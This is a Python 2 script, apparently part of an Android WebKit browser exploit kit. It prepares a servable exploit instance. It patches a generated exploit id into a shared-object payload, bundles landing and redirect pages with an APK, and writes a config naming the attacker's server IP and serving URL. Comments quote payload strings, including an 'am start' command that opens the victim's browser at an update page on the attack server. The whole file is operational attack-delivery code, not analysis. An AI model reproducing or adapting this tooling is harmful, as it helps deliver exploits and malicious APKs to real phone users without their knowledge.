src/ht-webkit-Android23/add_exploit_instance.py
#!/usr/bin/env python
import os
import sys
import random
import shutil
import string
import struct
def usage():
print 'usage: {} exploit_id server_ip shared_object redirect_page landing_page apk'.format(sys.argv[0])
print '\tpython2.7 {} 0123456789 192.168.1.1 libfingerprint.so redirect.html landing.html apkv2.apk'.format(sys.argv[0])
exit()
def generate_available_exploit_id():
while True:
candidate = ''.join([random.choice(string.digits) for i in range(0, 10) ] )
if not os.path.isdir(candidate):
return candidate
if __name__ == '__main__':
# print a suitable exploit_id
if len(sys.argv) == 1:
exp_id = generate_available_exploit_id()
print '[*] {} is available as exploit id '.format(exp_id)
exit()
# length
if len(sys.argv) != 7:
usage()
# 1] exploit_id
if len(sys.argv[1]) == 10:
try:
int(sys.argv[1])
except ValueError:
print 'exploit_id must be a 10 digits number'
usage()
else:
print 'exploit_id must be a 10 digits number'
usage()
if os.path.isdir(sys.argv[1]):
print 'exploit id already exists, try with {}'.format(generate_available_exploit_id())
exit()
exploit_id = sys.argv[1]
# 2] server_ip
octects = sys.argv[2].split('.')
if not ( len(octects) == 4 and all(0 <= int(o) < 256 for o in octects)):
print('Wrong server ip')
usage()
server_ip = sys.argv[2]
# 3] shared_object
if not os.path.isfile(sys.argv[3]):
print 'Shared object {} does not exist'.format(sys.argv[3])
usage()
shared_object = sys.argv[3]
# 4] redirect_page
if not os.path.isfile(sys.argv[4]):
print 'Redirect page {} does not exist'.format(sys.argv[4])
usage()
redirect_page = sys.argv[4]
# 5] landing_page
if not os.path.isfile(sys.argv[5]):
print 'Landing page {} does not exist'.format(sys.argv[5])
usage()
landing_page = sys.argv[5]
# 6] apk
if not os.path.isfile(sys.argv[6]):
print 'Apk {} does not exist'.format(sys.argv[6])
usage()
apk_path = sys.argv[6]
### params seems ok, patch the binary and proceed generating setup.txt ###
# replace 0123456789 in
# GET /news/0123456789/rep?%s HTTP/1.1
# am start -n com.android.browser/.BrowserActivity http://%s/news/0123456789/update.html
# so = map(lambda x : struct.unpack('>B', x)[0], open(shared_object, 'rb').read())
# needle = map(lambda x : ord(x) , 'news/0123456789/')
so = open(shared_object, 'rb').read()
print '[*] {} is {} bytes, patching exploit_id'.format(shared_object, len(so))
needle = 'news/0123456789/'
assert so.count(needle) == 2, 'Weird shared object'
new_so = so.replace(needle, 'news/{}/'.format(exploit_id))
# apk request string
needle2 = 'news_0123456789_'
assert so.count(needle2) == 1, 'Weird shared object 2'
new_so = new_so.replace(needle2, 'news_{}_'.format(exploit_id))
# create exploit_id dir and start dumping stuff into it
os.mkdir('{}'.format(exploit_id))
# 1] write new so
open('{}/{}_libfingerprint.so'.format(exploit_id, exploit_id), 'wb').write(new_so)
print '[*] shared object written'
# 2] cp landing and redirect page
shutil.copy(landing_page,'{}/landing.html'.format(exploit_id))
shutil.copy(redirect_page,'{}/redirect.html'.format(exploit_id))
print '[*] redirect/landing pages created'
# 3] cp apk
shutil.copy(apk_path, '{}/{}_apk'.format(exploit_id, exploit_id))
print '[*] apk created'
# create setup.txt, format:
#
# status:off
# requests:8
# ip:192.168.69.229
# so:0123456789_libfingerprint.so
# landing:landing.html
# redirect:redirect.html
# apk:0123456789_apk
setup = open('{}/setup.txt'.format(exploit_id), 'w')
setup.write('status:off \n')
setup.write('requests:0 \n')
setup.write('ip:{}\n'.format(server_ip) )
setup.write('so:{}_libfingerprint.so\n'.format(exploit_id))
setup.write('landing:landing.html\n')
setup.write('redirect:redirect.html\n')
setup.write('apk:{}_apk\n'.format(exploit_id))
setup.close()
print '[*] setup.txt created, exploit is served at:\n http://{}/news/{}/page.cfm'.format(server_ip,exploit_id)